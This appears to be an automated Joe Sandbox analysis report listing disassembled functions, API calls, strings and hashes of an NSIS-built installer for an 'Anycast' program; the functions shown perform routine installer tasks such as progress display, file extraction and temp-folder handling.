                                                                                                                              • Instruction Fuzzy Hash: CF51D331904204ABDB109FA5DD85B9E7EACEB48356F24803BF910BA2D1C77C9F418B9D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040324C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 664 40324c-403263 665 403265 664->665 666 40326c-403275 664->666 665->666 667 403277 666->667 668 40327e-403283 666->668 667->668 669 403293-4032a0 call 403467 668->669 670 403285-40328e call 40347d 668->670 674 403455 669->674 675 4032a6-4032aa 669->675 670->669 676 403457-403458 674->676 677 403400-403402 675->677 678 4032b0-4032f9 GetTickCount 675->678 681 403460-403464 676->681 679 403442-403445 677->679 680 403404-403407 677->680 682 40345d 678->682 683 4032ff-403307 678->683 684 403447 679->684 685 40344a-403453 call 403467 679->685 680->682 686 403409 680->686 682->681 687 403309 683->687 688 40330c-40331a call 403467 683->688 684->685 685->674 697 40345a 685->697 691 40340c-403412 686->691 687->688 688->674 696 403320-403329 688->696 694 403414 691->694 695 403416-403424 call 403467 691->695 694->695 695->674 701 403426-40342b call 405fb9 695->701 700 40332f-40334f call 406961 696->700 697->682 706 403355-403368 GetTickCount 700->706 707 4033f8-4033fa 700->707 705 403430-403432 701->705 708 403434-40343e 705->708 709 4033fc-4033fe 705->709 710 4033b3-4033b5 706->710 711 40336a-403372 706->711 707->676 708->691 712 403440 708->712 709->676 715 4033b7-4033bb 710->715 716 4033ec-4033f0 710->716 713 403374-403378 711->713 714 40337a-4033ab MulDiv wsprintfW call 405479 711->714 712->682 713->710 713->714 722 4033b0 714->722 719 4033d2-4033dd 715->719 720 4033bd-4033c4 call 405fb9 715->720 716->683 717 4033f6 716->717 717->682 721 4033e0-4033e4 719->721 724 4033c9-4033cb 720->724 721->700 725 4033ea 721->725 722->710 724->709 726 4033cd-4033d0 724->726 725->682 726->721
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                              • String ID: *B$ A$ A$... %d%%
                                                                                                                              • API String ID: 551687249-3485722521
                                                                                                                              • Opcode ID: cf131a18a01a91739215b3fb12c00283bd2acf225180283117d886d70d7c4c1a
                                                                                                                              • Instruction ID: 934ec796fb5923f126773143cacc3683187fa16e161fba292e3b1b9e9ada072f
                                                                                                                              • Opcode Fuzzy Hash: cf131a18a01a91739215b3fb12c00283bd2acf225180283117d886d70d7c4c1a
                                                                                                                              • Instruction Fuzzy Hash: 44518C71D00219DBCB11DF65EA84B9E7FA8AF01756F10817BEC10BB2C1C7789A40CBA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405479 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 727 405479-40548e 728 405494-4054a5 727->728 729 405545-405549 727->729 730 4054b0-4054bc lstrlenW 728->730 731 4054a7-4054ab call 40644e 728->731 733 4054d9-4054dd 730->733 734 4054be-4054ce lstrlenW 730->734 731->730 736 4054ec-4054f0 733->736 737 4054df-4054e6 SetWindowTextW 733->737 734->729 735 4054d0-4054d4 lstrcatW 734->735 735->733 738 4054f2-405534 SendMessageW * 3 736->738 739 405536-405538 736->739 737->736 738->739 739->729 740 40553a-40553d 739->740 740->729
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                              • lstrlenW.KERNEL32(004033B0,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                              • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,004033B0), ref: 004054D4
                                                                                                                              • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\), ref: 004054E6
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                              • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\
                                                                                                                              • API String ID: 2531174081-2092796827
                                                                                                                              • Opcode ID: aa92cd18e633272a9061a8b6b08b7c49714f2ce68e846d27045f56b788a6f560
                                                                                                                              • Instruction ID: 1ccddca99fa11d5427df38f31253403cabd393798f33362a1a37d4b4032a7ea7
                                                                                                                              • Opcode Fuzzy Hash: aa92cd18e633272a9061a8b6b08b7c49714f2ce68e846d27045f56b788a6f560
                                                                                                                              • Instruction Fuzzy Hash: 42219A71900518BBCB219F95DD85ACFBFB9EF45354F10803AF904B22A0C7798A908FA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 741 40176f-401794 call 402d3e call 405d5d 746 401796-40179c call 406411 741->746 747 40179e-4017b0 call 406411 call 405ce6 lstrcatW 741->747 752 4017b5-4017b6 call 4066c0 746->752 747->752 756 4017bb-4017bf 752->756 757 4017c1-4017cb call 40676f 756->757 758 4017f2-4017f5 756->758 766 4017dd-4017ef 757->766 767 4017cd-4017db CompareFileTime 757->767 759 4017f7-4017f8 call 405ee2 758->759 760 4017fd-401819 call 405f07 758->760 759->760 768 40181b-40181e 760->768 769 40188d-4018b6 call 405479 call 40324c 760->769 766->758 767->766 770 401820-40185e call 406411 * 2 call 40644e call 406411 call 405a77 768->770 771 40186f-401879 call 405479 768->771 783 4018b8-4018bc 769->783 784 4018be-4018ca SetFileTime 769->784 770->756 803 401864-401865 770->803 781 401882-401888 771->781 786 402bcb 781->786 783->784 785 4018d0-4018db FindCloseChangeNotification 783->785 784->785 788 4018e1-4018e4 785->788 789 402bc2-402bc5 785->789 791 402bcd-402bd1 786->791 792 4018e6-4018f7 call 40644e lstrcatW 788->792 793 4018f9-4018fc call 40644e 788->793 789->786 799 401901-40239a call 405a77 792->799 793->799 799->789 799->791 803->781 805 401867-401868 803->805 805->771
                                                                                                                              APIs
                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Program Files (x86)\Anycast\Anycast.exe","C:\Program Files (x86)\Anycast\Anycast.exe",00000000,00000000,"C:\Program Files (x86)\Anycast\Anycast.exe",00441000,?,?,00000031), ref: 004017D5
                                                                                                                                • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                                                                                • Part of subcall function 00405479: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                                • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000,0084A184,759223A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                                • Part of subcall function 00405479: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,004033B0), ref: 004054D4
                                                                                                                                • Part of subcall function 00405479: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\), ref: 004054E6
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                                • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                              • String ID: "C:\Program Files (x86)\Anycast\Anycast.exe"$State
                                                                                                                              • API String ID: 1941528284-3868726029
                                                                                                                              • Opcode ID: d3d0fd5b6cca21769a44bfa46eb1e3f4d952fc6e37e22d6f15feb808f3a701f1
                                                                                                                              • Instruction ID: 3db4763bd34d6378758f0dea6881e25fdbecc032a5989a9cd586940b12637d70
                                                                                                                              • Opcode Fuzzy Hash: d3d0fd5b6cca21769a44bfa46eb1e3f4d952fc6e37e22d6f15feb808f3a701f1
                                                                                                                              • Instruction Fuzzy Hash: 13419471500118BACF10BFA5CD85DAE7A79EF45368B20423FF512B21E1DB3C89919A2D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406796 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 807 406796-4067b6 GetSystemDirectoryW 808 4067b8 807->808 809 4067ba-4067bc 807->809 808->809 810 4067cd-4067cf 809->810 811 4067be-4067c7 809->811 813 4067d0-406803 wsprintfW LoadLibraryExW 810->813 811->810 812 4067c9-4067cb 811->812 812->813
                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                                                                              • wsprintfW.USER32 ref: 004067E8
                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                              • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                              • Instruction ID: 2cc1ede9ae180511fd9dc47da010e879a2503ad1dada0433f9440106b5f2728e
                                                                                                                              • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                              • Instruction Fuzzy Hash: 86F09670510119A7DB24BF64DE4DF9B366CAB00709F11447AA646F21D0EB7C9A68CBA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00402A03
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2667972263-0
                                                                                                                              • Opcode ID: ba4efd09cf5ceb564c2a4d9256b5475744f396f1f4035d7f32d2baf41c093cca
                                                                                                                              • Instruction ID: 6d3b5365c2144e4253305efdfeae8c7c86b7c4bf3cccdf3f9a106f7510f1e1f6
                                                                                                                              • Opcode Fuzzy Hash: ba4efd09cf5ceb564c2a4d9256b5475744f396f1f4035d7f32d2baf41c093cca
                                                                                                                              • Instruction Fuzzy Hash: 6121BD71800124BBCF216FA9DE49D9F7E79EF05364F10023AF560762E1CB784D419BA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405948 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 849 405948-405993 CreateDirectoryW 850 405995-405997 849->850 851 405999-4059a6 GetLastError 849->851 852 4059c0-4059c2 850->852 851->852 853 4059a8-4059bc SetFileSecurityW 851->853 853->850 854 4059be GetLastError 853->854 854->852
                                                                                                                              APIs
                                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B
                                                                                                                              • GetLastError.KERNEL32 ref: 0040599F
                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004059B4
                                                                                                                              • GetLastError.KERNEL32 ref: 004059BE
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040596E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 3449924974-823278215
                                                                                                                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                              • Instruction ID: 2a6702a12d34049f0ed6173726a665453ef4396ebd7eb618d4b77e108423b323
                                                                                                                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                              • Instruction Fuzzy Hash: 720108B1C10219EADF019BA4D948BEFBFB8EF04314F00803AD544B6180D77896488BA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 855 401c43-401c63 call 402d1c * 2 860 401c65-401c6c call 402d3e 855->860 861 401c6f-401c73 855->861 860->861 863 401c75-401c7c call 402d3e 861->863 864 401c7f-401c85 861->864 863->864 865 401cd3-401cfd call 402d3e * 2 FindWindowExW 864->865 866 401c87-401ca3 call 402d1c * 2 864->866 880 401d03 865->880 878 401cc3-401cd1 SendMessageW 866->878 879 401ca5-401cc1 SendMessageTimeoutW 866->879 878->880 881 401d06-401d09 879->881 880->881 882 402bc2-402bd1 881->882 883 401d0f 881->883 883->882
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                              • String ID: !
                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                              • Opcode ID: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                                                                              • Instruction ID: 0f37489a7ff55aa34ce709233052591c61f0789b3923deb1f93634f017c8c928
                                                                                                                              • Opcode Fuzzy Hash: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                                                                              • Instruction Fuzzy Hash: E821AD7195420AAEEF05AFB4D94AAEE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404C14 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CB5
                                                                                                                              • wsprintfW.USER32 ref: 00404CBE
                                                                                                                              • SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                              • Opcode ID: c11e598bb64db7278720907978e4551b1335f516c6367b7bdc55f40b45d88724
                                                                                                                              • Instruction ID: 33068f1a2098bbc59acf923d0b26dc9f7285eb9428391dcb76f0b5068863668e
                                                                                                                              • Opcode Fuzzy Hash: c11e598bb64db7278720907978e4551b1335f516c6367b7bdc55f40b45d88724
                                                                                                                              • Instruction Fuzzy Hash: 6A11EB73A041283BEB00656D9D46E9E329C9B85334F264237FA25F31D1E978C82182EC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405DEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
